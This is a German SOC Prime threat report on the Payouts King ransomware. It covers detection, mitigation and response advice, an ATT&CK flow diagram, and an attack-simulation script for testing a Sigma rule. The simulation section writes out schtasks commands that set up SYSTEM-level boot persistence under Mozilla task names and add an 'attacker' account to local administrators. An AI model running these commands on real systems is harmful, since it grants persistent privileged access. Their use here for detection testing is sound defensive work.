SOC Prime Bias: Hoch

17 Apr. 2026 17:40
newspaper icon ThreatLabz Ransomware-Bericht

Payouts-König nimmt den Ransomware-Thron ins Visier

Author Photo
SOC Prime Team linkedin icon Folgen
Payouts-König nimmt den Ransomware-Thron ins Visier
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Untersuchung

ThreatLabz analysierte mehrere Ransomware-Proben und entschlüsselte die benutzerdefinierten CRC- und FNV1-Hash-Funktionen, die von der Malware verwendet werden, und identifizierte die Persistenz durch geplante Aufgaben. Die Forscher dokumentierten auch das Verschlüsselungsschema, die angezielten Dateierweiterungen und den gesamten Ablauf der Ausführung. Ihre Analyse ergab eine eingebaute Liste sicherheitsrelevanter Prozesse, die die Ransomware versucht, mit Low-Level-Systemaufrufen vor der Verschlüsselung zu beenden. Zusätzliche Indikatoren, einschließlich Befehlszeilenparametern und Dateierweiterungsmustern, wurden direkt aus den Proben extrahiert, um die Erkennungs- und Jagdbemühungen zu unterstützen.

Minderung

Organisationen sollten die Multi-Faktor-Authentifizierung durchsetzen, Benutzer darin schulen, Social-Engineering-Versuche zu erkennen, und die Nutzung von Tools wie Microsoft Teams und Quick Assist auf verdächtige Aktivitäten überwachen. Verteidiger sollten auch bekannte ransomwarebezogene Dateierweiterungen blockieren und Endpoint-Erkennungen bereitstellen, die die Erstellung geplanter Aufgaben im Mozilla-Pfad sowie Aufrufe an SetFileInformationByHandle mit FileRenameInfo. Offline-Backups sollten regelmäßig gepflegt werden, und Schattenkopien sollten geschützt werden, um die Wiederherstellungsoptionen im Falle einer Verschlüsselung zu verbessern.

Reaktion

Wenn Payouts King-Aktivität erkannt wird, isolieren Sie das betroffene System umgehend und sammeln Sie sowohl flüchtigen Speicher als auch Festplattenabbilder zur forensischen Analyse. Ermittler sollten geplante Aufgaben auf Namen wie MozillaUpdateTask and MozillaElevateTasküberprüfen und dann nach den benutzerdefiniert CRC-geschützten Befehlszeilenargumenten und den einzigartigen verschlüsselten Dateierweiterungen suchen, die mit der Malware verbunden sind. Die Wiederherstellung sollte sich auf die Wiederherstellung von Daten aus verifizierten, sauberen Backups konzentrieren. Sicherheitsteams sollten auch die identifizierten Sample-Hashes an relevante Bedrohungsintelligenz-Plattformen übermitteln, um eine umfassendere Verfolgung und Verteidigung zu unterstützen.

graph TB classDef action fill:#99ccff classDef process fill:#ffcc99 classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef credential fill:#ffccff classDef operator fill:#ff9900 action_phishing[„<b>Aktion</b> – T1566.001 Phishing: Spearphishing-Anhang<br/><b>Beschreibung</b>: E-Mail mit bösartigem Anhang, der IT vorgibt.<br/><b>Technik-ID</b>: T1566.001“] class action_phishing action action_user_exec[„<b>Aktion</b> – T1204.002 Benutzer-Ausführung<br/><b>Beschreibung</b>: Opfer öffnet Datei und startet Ransomware.<br/><b>Technik-ID</b>: T1204.002“] class action_user_exec action tool_malicious_file[„<b>Tool</b> – Bösartige Payload-Datei<br/><b>Beschreibung</b>: Über Phishing gelieferte ausführbare Datei“] class tool_malicious_file tool process_cmd_shell[„<b>Prozess</b> – T1059.003 Windows Command Shell<br/><b>Beschreibung</b>: cmd.exe durch Ransomware gestartet.<br/><b>Technik-ID</b>: T1059.003“] class process_cmd_shell process action_scheduled_task[„<b>Aktion</b> – T1053 Geplante Aufgabe<br/><b>Beschreibung</b>: Erstellt \Mozilla\UpdateTask.<br/><b>Technik-ID</b>: T1053“] class action_scheduled_task action action_elevate_task[„<b>Aktion</b> – T1546 Ereignisgesteuerte Ausführung<br/><b>Beschreibung</b>: Ausführung als SYSTEM.<br/><b>Technik-ID</b>: T1546“] class action_elevate_task action defense_obfuscation_dynapi[„<b>Umgehung</b> – T1027.007 Dynamische API-Auflösung<br/><b>Beschreibung</b>: API-Hashing mit CRC/FNV1.<br/><b>Technik-ID</b>: T1027.007“] class defense_obfuscation_dynapi malware defense_evasion_process_kill[„<b>Umgehung</b> – T1564.011 Prozess-Interrupts ignorieren<br/><b>Beschreibung</b>: AV-Prozesse per Syscall beendet.<br/><b>Technik-ID</b>: T1564.011“] class defense_evasion_process_kill malware defense_obfuscation_general[„<b>Umgehung</b> – T1027 Verschleierte Dateien<br/><b>Beschreibung</b>: Stack-Strings und verschlüsselte Sections.<br/><b>Technik-ID</b>: T1027“] class defense_obfuscation_general malware impact_encrypt_files[„<b>Impact</b> – T1560.003 Benutzerdefinierte Verschlüsselung<br/><b>Beschreibung</b>: AES-256-CTR + RSA-4096.<br/><b>Technik-ID</b>: T1560.003“] class impact_encrypt_files malware impact_delete_shadows[„<b>Impact</b> – T1006 Schattenkopien löschen<br/><b>Beschreibung</b>: vssadmin entfernt Backups.<br/><b>Technik-ID</b>: T1006“] class impact_delete_shadows malware impact_clear_logs[„<b>Impact</b> – T1070.001 Windows-Logs löschen<br/><b>Beschreibung</b>: EvtClearLog entfernt Ereignisse.<br/><b>Technik-ID</b>: T1070.001“] class impact_clear_logs malware credential_private_key[„<b>Credential</b> – T1552.004 Private Schlüssel<br/><b>Beschreibung</b>: RSA schützt AES-Schlüssel.<br/><b>Technik-ID</b>: T1552.004“] class credential_private_key credential action_phishing –>|führt zu| action_user_exec action_user_exec –>|führt aus| tool_malicious_file tool_malicious_file –>|startet| process_cmd_shell process_cmd_shell –>|erstellt| action_scheduled_task action_scheduled_task –>|erstellt| action_elevate_task action_elevate_task –>|aktiviert| defense_obfuscation_dynapi action_elevate_task –>|aktiviert| defense_evasion_process_kill action_elevate_task –>|aktiviert| defense_obfuscation_general defense_obfuscation_dynapi –>|unterstützt| impact_encrypt_files defense_evasion_process_kill –>|unterstützt| impact_encrypt_files defense_obfuscation_general –>|unterstützt| impact_encrypt_files impact_encrypt_files –>|nutzt| credential_private_key impact_encrypt_files –>|verursacht| impact_delete_shadows impact_encrypt_files –>|verursacht| impact_clear_logs

Angriffsablauf

Simulation-Ausführung

Voraussetzung: Die Telemetrie- und Basislinien-Vorflugprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, genau die erwartete Telemetrie zu generieren, die durch die Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:

    Der Angreifer, der sich initial Zugang verschafft hat, möchte sicherstellen, dass die Ransomware bei jedem Systemneustart ausgeführt wird und SYSTEM-Berechtigungen erlangt. Sie verwenden die native schtasks.exe -Binärdatei, um die Einführung von Drittanbieter-Tools zu vermeiden. Zuerst erstellen sie ein „UpdateTask“, das eine Dummy-Ransomware-Nutzlast ausführt, dann sofort eine „ElevateTask“, die einen privilegierten Prozess erzeugt, um die Infektionskette weiterzuführen. Beide Aufgaben werden unter dem Mozilla Namensraum platziert, um das bekannte Payouts King-Muster nachzubilden.

    1. Erstellen Sie UpdateTask:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe"

    2. Erstellen Sie ElevateTask:

      schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"

    3. Führen Sie ElevateTask sofort aus:

      schtasks.exe /run /tn MozillaElevateTask

    4. (Optional) Überprüfen Sie, ob Aufgaben vorhanden sind:

      schtasks.exe /query /tn Mozilla* /fo LIST /v

    Diese genauen Befehlszeilen passen zu den selection1 and selection2 Klauseln der Sigma-Regel und erfüllen die Bedingung: selection1 und selection2 und nicht Ausschluss.

  • Regressionstest-Skript:

    # Payouts King Persistenz durch geplante Aufgaben-Simulation
# -------------------------------------------------
# Schritt 1: Erstellen Sie die UpdateTask (Persistenz beim Booten)
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaUpdateTask /TR "cmd.exe /c start C:Temppayouts_king.exe"

# Schritt 2: Erstellen Sie die ElevateTask (Privilege Escalation Helper)
schtasks.exe /s "localhost" /ru "SYSTEM" /create /f /sc ONSTART /TN MozillaElevateTask /TR "cmd.exe /c whoami && net localgroup administrators /add attacker"

# Schritt 3: Führen Sie die ElevateTask sofort aus, um das zweite Erkennungsereignis zu generieren
schtasks.exe /run /tn MozillaElevateTask

# Schritt 4: Ausgabe Bestätigung (nicht erforderlich für Erkennung, für Betreiber Sichtbarkeit)
Write-Host "Geplante Aufgaben erstellt und ElevateTask ausgeführt."

  • Bereinigung Befehle:

    # Entfernen Sie die für den Test erstellten Aufgaben
schtasks.exe /delete /tn MozillaElevateTask /f
schtasks.exe /delete /tn MozillaUpdateTask /f

# Löschen Sie optional die Dummy-Nutzlast
Remove-Item -Path "C:Temppayouts_king.exe" -ErrorAction SilentlyContinue

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten